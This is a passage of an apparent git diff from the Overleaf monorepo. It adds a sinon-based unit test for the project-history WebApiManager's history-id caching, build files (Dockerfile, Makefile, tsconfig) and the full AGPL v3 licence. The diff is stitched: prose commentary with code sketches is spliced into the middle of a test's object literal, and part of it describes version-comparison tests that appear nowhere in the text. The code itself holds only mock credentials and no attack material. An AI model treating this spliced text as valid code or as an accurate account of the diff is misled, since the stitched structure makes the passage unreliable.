apis: { + web: { + url: 'http://example.com', + user: 'overleaf', + pass: 'password', + }, + }, + } + this.userId = 'mock-user-id' + this.projectId = 'mock-project-id' + this.project = { features: 'mock-features' } + this.olProjectId = 12345 + this.Metrics = { inc: sinon.stub() } + this.RedisManager = { + promises: { + getCachedHistoryId: sinon.stub(), + setCachedHistoryId: sinon.stub().resolves(), + }, + } + this.FetchUtils = { + fetchNothing: sinon.stub().resolves(), + fetchJson: sinon.stub(), + RequestFailedError, + } + this.WebApiManager = await esmock(MODULE_PATH, { + '@overleaf/fetch-utils': this.FetchUtils, + '@overleaf/settings': this.settings, + '@overleaf/metrics': this.Metrics, + '../../../../app/js/RedisManager.js': this.RedisManager, + }) + this.WebApiManager.setRetryTimeoutMs(100) + }) + + describe('getHistoryId', function () { + describe('when there is no cached value and the web request is successful', function () { + beforeEach(function () { + this.RedisManager.promises.getCachedHistoryId + .withArgs(this.projectId) // first call, no cached value returned + .onCall(0) + .resolves(null) + this.RedisManager.promises.getCachedHistoryId + .withArgs(this.projectId) // subsequent calls, return cached value + .resolves(this.olProjectId) + this.RedisManager.promises.getCachedHistoryId + .withArgs('mock-project-id-2') // no cached value for other project + .resolves(null) + this.FetchUtils.fetchJson.resolves({ 
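The compare/gt/gte/lt/lte cases above pin down a numeric, non-lexical comparison of 'major.minor' strings, with a missing minor component treated as zero (so '2.10' sorts above '2.9' and '2' equals '2.0'). A sketch of that comparison:

function compareVersions(a, b) {
  const [majorA = 0, minorA = 0] = a.split('.').map(Number)
  const [majorB = 0, minorB = 0] = b.split('.').map(Number)
  if (majorA !== majorB) return majorA > majorB ? +1 : -1
  if (minorA !== minorB) return minorA > minorB ? +1 : -1
  return 0
}

console.log(compareVersions('2.10', '2.9')) // +1 (numeric, not lexical)
console.log(compareVersions('1', '2.1')) // -1
console.log(compareVersions('2', '2')) // 0

The boolean helpers then follow directly, e.g. gte(a, b) is compareVersions(a, b) >= 0.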
+ overleaf: { history: { id: this.olProjectId } }, + }) + }) + + it('should only request project details once per project', async function () { + for (let i = 0; i < 5; i++) { + await this.WebApiManager.promises.getHistoryId(this.projectId) + } + this.FetchUtils.fetchJson.should.have.been.calledOnce + + await this.WebApiManager.promises.getHistoryId('mock-project-id-2') + this.FetchUtils.fetchJson.should.have.been.calledTwice + }) + + it('should cache the history id', async function () { + const olProjectId = await this.WebApiManager.promises.getHistoryId( + this.projectId + ) + this.RedisManager.promises.setCachedHistoryId + .calledWith(this.projectId, olProjectId) + .should.equal(true) + }) + + it("should return the project's history id", async function () { + const olProjectId = await this.WebApiManager.promises.getHistoryId( + this.projectId + ) + + expect(this.FetchUtils.fetchJson).to.have.been.calledWithMatch( + `${this.settings.apis.web.url}/project/${this.projectId}/details`, + { + basicAuth: { + user: this.settings.apis.web.user, + password: this.settings.apis.web.pass, + }, + } + ) + expect(olProjectId).to.equal(this.olProjectId) + }) + }) + + describe('when the web API returns an error', function () { + beforeEach(function () { + this.error = new Error('something went wrong') + this.FetchUtils.fetchJson.rejects(this.error) + this.RedisManager.promises.getCachedHistoryId.resolves(null) + }) + + it('should throw an error', async function () { + await expect( + this.WebApiManager.promises.getHistoryId(this.projectId) + ).to.be.rejectedWith(this.error) + }) + }) + + describe('when web returns a 404', function () { + beforeEach(function () { + this.FetchUtils.fetchJson.rejects( + new RequestFailedError( + 'http://some-url', + {}, + { status: 404 }, + 'Not found' + ) + ) + this.RedisManager.promises.getCachedHistoryId.resolves(null) + }) + + it('should throw an error', async function () { + await expect( + this.WebApiManager.promises.getHistoryId(this.projectId) + ).to.be.rejectedWith('got a 404 from web api') + }) + }) + + describe('when web returns a failure error code', function () { + beforeEach(function () { + this.RedisManager.promises.getCachedHistoryId.resolves(null) + this.FetchUtils.fetchJson.rejects( + new RequestFailedError( + 'http://some-url', + {}, + { status: 500 }, + 'Error' + ) + ) + }) + + it('should throw an error', async function () { + await expect( + this.WebApiManager.promises.getHistoryId(this.projectId) + ).to.be.rejectedWith(RequestFailedError) + }) + }) + }) +}) diff --git a/services/project-history/tsconfig.json b/services/project-history/tsconfig.json new file mode 100644 index 0000000..d3fdd30 --- /dev/null +++ b/services/project-history/tsconfig.json @@ -0,0 +1,12 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "app.js", + "app/js/**/*", + "benchmarks/**/*", + "config/**/*", + "scripts/**/*", + "test/**/*", + "types" + ] +} diff --git a/services/real-time/.gitignore b/services/real-time/.gitignore new file mode 100644 index 0000000..80bac79 --- /dev/null +++ b/services/real-time/.gitignore @@ -0,0 +1,5 @@ +node_modules +forever + +# managed by dev-environment$ bin/update_build_scripts +.npmrc diff --git a/services/real-time/.mocharc.json b/services/real-time/.mocharc.json new file mode 100644 index 0000000..dc3280a --- /dev/null +++ b/services/real-time/.mocharc.json @@ -0,0 +1,3 @@ +{ + "require": "test/setup.js" +} diff --git a/services/real-time/.nvmrc b/services/real-time/.nvmrc new file mode 100644 index 0000000..0254b1e --- 
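The getHistoryId tests above pin down a cache-then-fetch pattern: Redis is consulted first, the /project/:id/details endpoint is hit at most once per project on a cache miss, and the id is written back to the cache; a 404 from web is surfaced as its own error rather than retried. A promise-style sketch with illustrative dependency names:

async function getHistoryId(projectId, { redis, fetchJson, webUrl }) {
  const cached = await redis.getCachedHistoryId(projectId)
  if (cached != null) return cached // no web round-trip on a cache hit
  const details = await fetchJson(`${webUrl}/project/${projectId}/details`)
  const historyId = details.overleaf.history.id
  await redis.setCachedHistoryId(projectId, historyId)
  return historyId
}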
/dev/null +++ b/services/real-time/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/services/real-time/Dockerfile b/services/real-time/Dockerfile new file mode 100644 index 0000000..d1f2046 --- /dev/null +++ b/services/real-time/Dockerfile @@ -0,0 +1,27 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +FROM node:20.18.2 AS base + +WORKDIR /overleaf/services/real-time + +# Google Cloud Storage needs a writable $HOME/.config for resumable uploads +# (see https://googleapis.dev/nodejs/storage/latest/File.html#createWriteStream) +RUN mkdir /home/node/.config && chown node:node /home/node/.config + +FROM base AS app + +COPY package.json package-lock.json /overleaf/ +COPY services/real-time/package.json /overleaf/services/real-time/ +COPY libraries/ /overleaf/libraries/ +COPY patches/ /overleaf/patches/ + +RUN cd /overleaf && npm ci --quiet + +COPY services/real-time/ /overleaf/services/real-time/ + +FROM app +USER node + +CMD ["node", "--expose-gc", "app.js"] diff --git a/services/real-time/LICENSE b/services/real-time/LICENSE new file mode 100644 index 0000000..dba13ed --- /dev/null +++ b/services/real-time/LICENSE @@ -0,0 +1,661 @@ + GNU AFFERO GENERAL PUBLIC LICENSE + Version 3, 19 November 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/> + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU Affero General Public License is a free, copyleft license for +software and other kinds of works, specifically designed to ensure +cooperation with the community in the case of network server software. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. + + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public. + + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. 
It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. 
A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. 
+ + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. 
+ + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. 
+ + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. 
+ + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. 
If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). 
To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. 
+ + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. 
+ + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + <one line to give the program's name and a brief idea of what it does.> + Copyright (C) <year> <name of author> + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU Affero General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU Affero General Public License for more details. + + You should have received a copy of the GNU Affero General Public License + along with this program. If not, see <http://www.gnu.org/licenses/>. + +Also add information on how to contact you by electronic and paper mail. + + If your software can interact with users remotely through a computer +network, you should also make sure that it provides a way for users to +get its source. For example, if your program is a web application, its +interface could display a "Source" link that leads users to an archive +of the code. There are many ways you could offer source, and different +solutions will be better for different programs; see section 13 for the +specific requirements. + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU AGPL, see +<http://www.gnu.org/licenses/>. diff --git a/services/real-time/Makefile b/services/real-time/Makefile new file mode 100644 index 0000000..e9e6a7a --- /dev/null +++ b/services/real-time/Makefile @@ -0,0 +1,156 @@ +# This file was auto-generated, do not edit it directly. 
+# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +BUILD_NUMBER ?= local +BRANCH_NAME ?= $(shell git rev-parse --abbrev-ref HEAD) +PROJECT_NAME = real-time +BUILD_DIR_NAME = $(shell pwd | xargs basename | tr -cd '[a-zA-Z0-9_.\-]') + +DOCKER_COMPOSE_FLAGS ?= -f docker-compose.yml +DOCKER_COMPOSE := BUILD_NUMBER=$(BUILD_NUMBER) \ + BRANCH_NAME=$(BRANCH_NAME) \ + PROJECT_NAME=$(PROJECT_NAME) \ + MOCHA_GREP=${MOCHA_GREP} \ + docker compose ${DOCKER_COMPOSE_FLAGS} + +COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE ?= test_acceptance_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_ACCEPTANCE = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE) $(DOCKER_COMPOSE) + +COMPOSE_PROJECT_NAME_TEST_UNIT ?= test_unit_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_UNIT = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_UNIT) $(DOCKER_COMPOSE) + +clean: + -docker rmi ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -docker rmi us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -$(DOCKER_COMPOSE_TEST_UNIT) down --rmi local + -$(DOCKER_COMPOSE_TEST_ACCEPTANCE) down --rmi local + +HERE=$(shell pwd) +MONOREPO=$(shell cd ../../ && pwd) +# Run the linting commands in the scope of the monorepo. +# Eslint and prettier (plus some configs) are on the root. +RUN_LINTING = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(HERE) node:20.18.2 npm run --silent + +RUN_LINTING_CI = docker run --rm --volume $(MONOREPO)/.editorconfig:/overleaf/.editorconfig --volume $(MONOREPO)/.eslintignore:/overleaf/.eslintignore 